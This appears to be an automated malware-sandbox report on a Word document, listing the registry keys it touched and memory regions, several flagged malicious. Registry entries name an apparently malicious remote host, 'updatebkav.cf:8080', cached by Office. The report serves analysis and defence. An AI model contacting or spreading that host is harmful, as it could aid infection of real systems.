HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\2B666
2B666
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
ly;
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
my;
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
=%+
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
s'+
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
r)+
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://updatebkav.cf:8080/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://updatebkav.cf:8080/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://updatebkav.cf:8080/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://updatebkav.cf:8080/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://updatebkav.cf:8080/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://updatebkav.cf:8080/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://updatebkav.cf:8080/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://updatebkav.cf:8080/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\https://updatebkav.cf:8080/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
There are 143 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
AE0000
heap
page read and write
malicious
C00000
heap
page read and write
malicious
980000
heap
page read and write
malicious
A620000
trusted library allocation
page read and write
76E0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
8830000
unkown
page read and write
9860000
trusted library allocation
page read and write
7B3D000
stack
page read and write
CE9000
heap
page read and write
25969F00000
heap
page read and write
62E59FE000
stack
page read and write
9880000
trusted library allocation
page read and write
B4B0000
trusted library allocation
page read and write
97F2000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
5400000
trusted library allocation
page read and write
5E17000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
93F0000
unkown
page read and write
97F0000
trusted library allocation
page read and write
76C0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
1DE9AD6C000
heap
page read and write
8620000
unkown
page read and write
97A0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
D0E000
heap
page read and write
2725B3A0000
unkown
page read and write
14C09C29000
heap
page read and write
1DE9ADC4000
heap
page read and write
95D0000
trusted library allocation
page read and write
480000
heap
page read and write
93D0000
trusted library allocation
page read and write
93D5000
unkown
page read and write
2177EE00000
heap
page read and write
9780000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
24009A28000
heap
page read and write
98A0000
trusted library allocation
page read and write
219E6462000
heap
page read and write
7450000
trusted library allocation
page read and write
A667000
trusted library allocation
page read and write
7560000
heap
page execute and read and write
2177EF08000
heap
page read and write
99FD000
trusted library allocation
page read and write
3ACE677000
stack
page read and write
2A409A00000
heap
page read and write
8620000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
DD4F27E000
stack
page read and write
530000
remote allocation
page read and write
530000
remote allocation
page read and write
1160000
heap
page read and write
7580000
trusted library allocation
page read and write
C91000
heap
page read and write
8140000
heap
page read and write
8835000
trusted library allocation
page read and write
D247F1B000
stack
page read and write
9670000
trusted library allocation
page read and write
1DE9B202000
heap
page read and write
9820000
trusted library allocation
page read and write
25969E49000
heap
page read and write
85D0000
trusted library allocation
page read and write
1DE9AD85000
heap
page read and write
660000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
85F0000
trusted library allocation
page read and write
A6CE000
stack
page read and write
B70000
heap
page read and write
2A409A13000
heap
page read and write
2880C8C0000
heap
page read and write
D3C000
heap
page read and write
7860000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
1DE9AD7F000
heap
page read and write
3160000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
B1F0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
B470000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
76F0000
trusted library allocation
page read and write
A5F7000
trusted library allocation
page read and write
5D0A000
trusted library allocation
page read and write
8838000
trusted library allocation
page read and write
C3CCEBB000
stack
page read and write
A570000
trusted library allocation
page read and write
1DE9ADD7000
heap
page read and write
27C54BF0000
heap
page read and write
3120000
trusted library allocation
page read and write
1A91A20D000
heap
page read and write
5D89000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
2880C8CB000
heap
page read and write
98D0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
8620000
unkown
page read and write
9A23000
trusted library allocation
page read and write
1DE9AD9A000
heap
page read and write
9785000
trusted library allocation
page read and write
14C09C40000
heap
page read and write
A630000
trusted library allocation
page read and write
B470000
trusted library allocation
page read and write
CD7000
heap
page read and write
9800000
trusted library allocation
page read and write
24CB4ECB000
heap
page read and write
1A915318000
heap
page read and write
A790000
trusted library allocation
page read and write
9785000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
24CB4E87000
heap
page read and write
93E0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
2A409A55000
heap
page read and write
C2F000
heap
page read and write
B500000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
B415000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
1DE9AC02000
heap
page read and write
97D0000
trusted library allocation
page read and write
4837000
trusted library allocation
page read and write
62E617E000
stack
page read and write
EE2359E000
stack
page read and write
8620000
trusted library allocation
page read and write
27C54C00000
heap
page read and write
97A0000
trusted library allocation
page read and write
2177EF00000
heap
page read and write
98F0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
8830000
unkown
page read and write
85B0000
trusted library allocation
page read and write
97C0000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
85A0000
trusted library allocation
page read and write
5DDF000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
5CE000
stack
page read and write
3160000
trusted library allocation
page read and write
BA5E000
trusted library allocation
page read and write
74E0000
trusted library allocation
page read and write
86D44FE000
stack
page read and write
93D6000
trusted library allocation
page read and write
2177EE5E000
heap
page read and write
E2176F7000
stack
page read and write
1A915313000
heap
page read and write
8830000
trusted library allocation
page read and write
8728000
trusted library allocation
page read and write
25969E8D000
heap
page read and write
B500000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
A670000
trusted library allocation
page execute and read and write
B430000
trusted library allocation
page read and write
93D0000
unkown
page read and write
5D81000
trusted library allocation
page read and write
9A70000
trusted library allocation
page read and write
33FE000
stack
page read and write
93D0000
unkown
page read and write
219E6400000
heap
page read and write
8835000
trusted library allocation
page read and write
B27E000
trusted library allocation
page read and write
4C8C000
stack
page read and write
A650000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
9920000
trusted library allocation
page execute and read and write
C61000
heap
page read and write
9800000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
5A8C000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
A5D0000
trusted library section
page read and write
2880C8D6000
heap
page read and write
B210000
trusted library allocation
page read and write
98C7000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
7920000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
95D6000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
B650000
trusted library allocation
page read and write
5282000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9785000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
986000
heap
page read and write
B275000
trusted library allocation
page read and write
1DE9AB30000
remote allocation
page read and write
9780000
trusted library allocation
page read and write
CB2000
heap
page read and write
7610000
trusted library allocation
page read and write
5DB8000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
93D0000
trusted library allocation
page read and write
1A91A050000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
F9E000
stack
page read and write
95E0000
trusted library allocation
page read and write
114E000
stack
page read and write
7B84000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
F7DC6FF000
stack
page read and write
99B0000
trusted library allocation
page execute and read and write
97E0000
trusted library allocation
page read and write
97C0000
unkown
page read and write
B440000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
1A91A2E5000
heap
page read and write
BB1000
direct allocation
page read and write
52B0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
85A0000
trusted library allocation
page read and write
E2177FF000
stack
page read and write
2880C8D1000
heap
page read and write
A5F0000
trusted library allocation
page read and write
BA66000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
CE9000
heap
page read and write
74D0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
27C54C3C000
heap
page read and write
A5B0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
E6D6EFF000
stack
page read and write
9930000
trusted library allocation
page read and write
8830000
unkown
page read and write
75F0000
trusted library allocation
page read and write
1040000
trusted library allocation
page read and write
B43C000
trusted library allocation
page read and write
9C00000
trusted library allocation
page read and write
CFD000
heap
page read and write
9600000
trusted library allocation
page read and write
B83000
heap
page read and write
8830000
unkown
page read and write
B460000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
EFB00FF000
stack
page read and write
95D5000
trusted library allocation
page read and write
1DE9ADA4000
heap
page read and write
9400000
trusted library allocation
page read and write
95D7000
trusted library allocation
page read and write
1A914AB9000
heap
page read and write
93F0000
trusted library allocation
page read and write
9650000
unkown
page read and write
97D0000
trusted library allocation
page read and write
A5C0000
trusted library allocation
page read and write
85E0000
trusted library allocation
page read and write
95D5000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
334EB7F000
stack
page read and write
95E5000
trusted library allocation
page read and write
95EF000
trusted library allocation
page read and write
62E5CFF000
stack
page read and write
1DE9AD7B000
heap
page read and write
2A409AA1000
heap
page read and write
1A91A01E000
trusted library allocation
page read and write
BCFD000
trusted library allocation
page read and write
DD4EB7E000
stack
page read and write
93F0000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
B190000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
97E0000
trusted library allocation
page read and write
9A40000
trusted library allocation
page read and write
9405000
trusted library allocation
page read and write
219E6413000
heap
page read and write
9680000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
1A91A054000
trusted library allocation
page read and write
219E6C02000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
95F0000
unkown
page read and write
9620000
unkown
page read and write
97F0000
trusted library allocation
page read and write
1A914A9C000
heap
page read and write
CDA000
heap
page read and write
1DE9AD98000
heap
page read and write
1300000
direct allocation
page read and write
2177EF02000
heap
page read and write
93E0000
trusted library allocation
page read and write
A790000
trusted library allocation
page read and write
219E6474000
heap
page read and write
9810000
trusted library allocation
page read and write
9400000
unkown
page read and write
B160000
trusted library allocation
page execute and read and write
219E6502000
heap
page read and write
7540000
trusted library allocation
page read and write
30F0000
trusted library allocation
page read and write
97D5000
unkown
page read and write
1DE9AD9A000
heap
page read and write
97E0000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
9760000
trusted library allocation
page read and write
D7A7AFE000
stack
page read and write
8590000
trusted library allocation
page read and write
1A91A2D7000
heap
page read and write
98A0000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
8199000
trusted library allocation
page read and write
8830000
unkown
page read and write
E6D69FE000
stack
page read and write
487C000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
CED000
heap
page read and write
1DE9AD64000
heap
page read and write
6DC0000
direct allocation
page read and write
9750000
trusted library allocation
page read and write
9B90000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
62E5DFA000
stack
page read and write
219E62E0000
heap
page read and write
95D0000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
A647000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
85A0000
trusted library allocation
page execute and read and write
9750000
unkown
page read and write
9862000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
D22000
heap
page read and write
9650000
unkown
page read and write
93D0000
unkown
page read and write
2A409A67000
heap
page read and write
BD92000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
2725B0F0000
unkown
page read and write
A640000
trusted library allocation
page read and write
1DE9AD7C000
heap
page read and write
9790000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
CBF000
heap
page read and write
98A0000
trusted library allocation
page read and write
1A915AF0000
trusted library section
page readonly
9620000
unkown
page read and write
2A409A64000
heap
page read and write
93D0000
unkown
page read and write
93D0000
unkown
page read and write
A570000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
A790000
trusted library allocation
page read and write
96E0000
unkown
page read and write
53FD000
stack
page read and write
93F000
stack
page read and write
D04000
heap
page read and write
9815000
trusted library allocation
page read and write
C50000
heap
page read and write
97F0000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
1DE9AD7C000
heap
page read and write
8836000
unkown
page read and write
96C0000
trusted library allocation
page read and write
2725B3F0000
unkown
page read and write
56BF000
stack
page read and write
B85D000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
9786000
trusted library allocation
page read and write
8194000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
A84D000
stack
page read and write
1A91A0E0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
B17000
heap
page read and write
9750000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
A600000
trusted library allocation
page read and write
6462000
trusted library allocation
page read and write
27C54C79000
heap
page read and write
B430000
trusted library allocation
page read and write
9650000
unkown
page read and write
9930000
trusted library allocation
page read and write
13C0000
direct allocation
page read and write
9740000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
1A915AC0000
trusted library section
page readonly
D24867B000
stack
page read and write
A620000
trusted library allocation
page read and write
219E647A000
heap
page read and write
B410000
trusted library allocation
page read and write
528B000
trusted library allocation
page execute and read and write
7530000
trusted library allocation
page read and write
7500000
trusted library allocation
page read and write
9860000
trusted library allocation
page read and write
1DE9AD1C000
heap
page read and write
9A96000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
B4E0000
trusted library allocation
page read and write
7B80000
trusted library allocation
page read and write
8620000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
119F000
stack
page read and write
7B90000
trusted library allocation
page read and write
171F8510000
heap
page read and write
75E0000
trusted library allocation
page read and write
62E52AC000
stack
page read and write
97D0000
trusted library allocation
page read and write
30F0000
remote allocation
page read and write
1DE9A4B0000
heap
page read and write
97F0000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
A630000
trusted library allocation
page read and write
1350000
heap
page read and write
98A0000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
A640000
trusted library allocation
page read and write
97A0000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
C91000
heap
page read and write
219E6457000
heap
page read and write
3400000
heap
page read and write
DD4F177000
stack
page read and write
97D0000
trusted library allocation
page read and write
B240000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9930000
trusted library allocation
page read and write
8835000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
B440000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
33B2000
heap
page read and write
A620000
trusted library allocation
page read and write
A790000
trusted library allocation
page read and write
CC9000
heap
page read and write
A790000
trusted library allocation
page read and write
2A409A3C000
heap
page read and write
1DE9AD7B000
heap
page read and write
A680000
trusted library allocation
page read and write
3315000
heap
page read and write
BDD6000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
93F5000
unkown
page read and write
97A0000
trusted library allocation
page read and write
A590000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
4DD0000
trusted library allocation
page read and write
81BB000
trusted library allocation
page read and write
5263000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
862F000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
CB4000
heap
page read and write
BD6C000
trusted library allocation
page read and write
9920000
trusted library allocation
page read and write
C3CD9FE000
stack
page read and write
3308000
heap
page read and write
97E0000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
CD9000
heap
page read and write
5CA5000
trusted library allocation
page read and write
A590000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
F7DC77B000
stack
page read and write
269D8302000
heap
page read and write
A590000
trusted library allocation
page read and write
5A95000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
3150000
trusted library allocation
page read and write
8590000
trusted library allocation
page read and write
3ACE77E000
stack
page read and write
53F0000
heap
page read and write
A630000
trusted library allocation
page read and write
A650000
trusted library allocation
page read and write
33AE000
heap
page read and write
A640000
trusted library allocation
page read and write
591000
stack
page read and write
269D8248000
heap
page read and write
EE23CFF000
stack
page read and write
98F0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
1DE9AD2F000
heap
page read and write
9610000
trusted library allocation
page read and write
A5D0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
5390000
trusted library allocation
page read and write
B200000
trusted library allocation
page read and write
9740000
trusted library allocation
page read and write
8170000
trusted library allocation
page read and write
B9F0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
1DE9A4AC000
heap
page read and write
C3CD5FE000
stack
page read and write
269D823A000
heap
page read and write
9CCE000
unkown
page read and write
B410000
trusted library allocation
page read and write
219E6429000
heap
page read and write
B470000
trusted library allocation
page read and write
9790000
trusted library allocation
page read and write
5297000
heap
page read and write
97E0000
trusted library allocation
page read and write
3160000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
F7DC19C000
stack
page read and write
9920000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
98C0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
7650000
trusted library allocation
page read and write
B98000
heap
page read and write
5A58000
trusted library allocation
page read and write
A5F0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
4BD000
stack
page read and write
A5E0000
trusted library allocation
page read and write
D24857B000
stack
page read and write
B400000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
A590000
trusted library allocation
page read and write
9820000
trusted library allocation
page read and write
B400000
trusted library allocation
page read and write
2A409B08000
heap
page read and write
B500000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
7620000
trusted library allocation
page read and write
C0E000
heap
page read and write
A5F0000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
A680000
trusted library allocation
page read and write
2A409A8A000
heap
page read and write
B410000
trusted library allocation
page read and write
B7E000
stack
page read and write
5C9D000
trusted library allocation
page read and write
96E0000
unkown
page read and write
A5F0000
trusted library allocation
page read and write
171F8E02000
trusted library allocation
page read and write
86B0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
A610000
trusted library allocation
page read and write
9A90000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
93E5000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
2A409A60000
heap
page read and write
D7A7F7E000
stack
page read and write
A650000
trusted library allocation
page read and write
BADE000
trusted library allocation
page read and write
85D0000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
D0E000
heap
page read and write
97E0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9780000
trusted library allocation
page read and write
C80000
heap
page read and write
93E0000
trusted library allocation
page read and write
9810000
trusted library allocation
page read and write
9750000
trusted library allocation
page read and write
1DE9AD68000
heap
page read and write
7520000
trusted library allocation
page read and write
98A0000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
3ACDF9B000
stack
page read and write
9780000
trusted library allocation
page read and write
9780000
trusted library allocation
page execute and read and write
7820000
trusted library allocation
page read and write
9870000
trusted library allocation
page read and write
25969E00000
heap
page read and write
8568000
trusted library allocation
page read and write
97F0000
trusted library allocation
page read and write
97B0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
9848000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
B420000
trusted library allocation
page read and write
24009A64000
heap
page read and write
9640000
trusted library allocation
page read and write
A590000
trusted library allocation
page read and write
1DE9AD85000
heap
page read and write
95D0000
unkown
page read and write
98A0000
trusted library allocation
page read and write
97D0000
trusted library allocation
page read and write
219E645C000
heap
page read and write
A590000
trusted library allocation
page read and write
269D8200000
heap
page read and write
B4D0000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
8836000
unkown
page read and write
9820000
trusted library allocation
page read and write
1DE9B202000
heap
page read and write
95E0000
trusted library allocation
page read and write
1DE9AD7B000
heap
page read and write
7530000
trusted library allocation
page read and write
ADF000
stack
page read and write
8620000
unkown
page read and write
97C0000
trusted library allocation
page read and write
A660000
trusted library allocation
page read and write
9800000
trusted library allocation
page read and write
C7D000
heap
page read and write
14C09AE0000
heap
page read and write
97F0000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
62E56F7000
stack
page read and write
97E0000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
B430000
trusted library allocation
page read and write
2725B102000
unkown
page read and write
74D0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
1EB28FF000
stack
page read and write
1DE9A2A0000
heap
page read and write
83EF000
stack
page read and write
95D5000
trusted library allocation
page read and write
219E6444000
heap
page read and write
C81000
heap
page read and write
9940000
trusted library allocation
page read and write
CEF000
heap
page read and write
85C0000
trusted library allocation
page execute and read and write
1DE9AD2F000
heap
page read and write
219E645B000
heap
page read and write
A5F0000
trusted library allocation
page read and write
8620000
unkown
page read and write
9420000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
9940000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
A620000
trusted library allocation
page read and write
97E0000
trusted library allocation
page read and write
6DA0000
direct allocation
page read and write
9910000
trusted library allocation
page read and write
1DE9A47B000
heap
page read and write
B470000
trusted library allocation
page read and write
A570000
trusted library allocation
page read and write
B410000
trusted library allocation
page read and write
B237000
trusted library allocation
page read and write
B450000
trusted library allocation
page read and write
95E0000
unkown
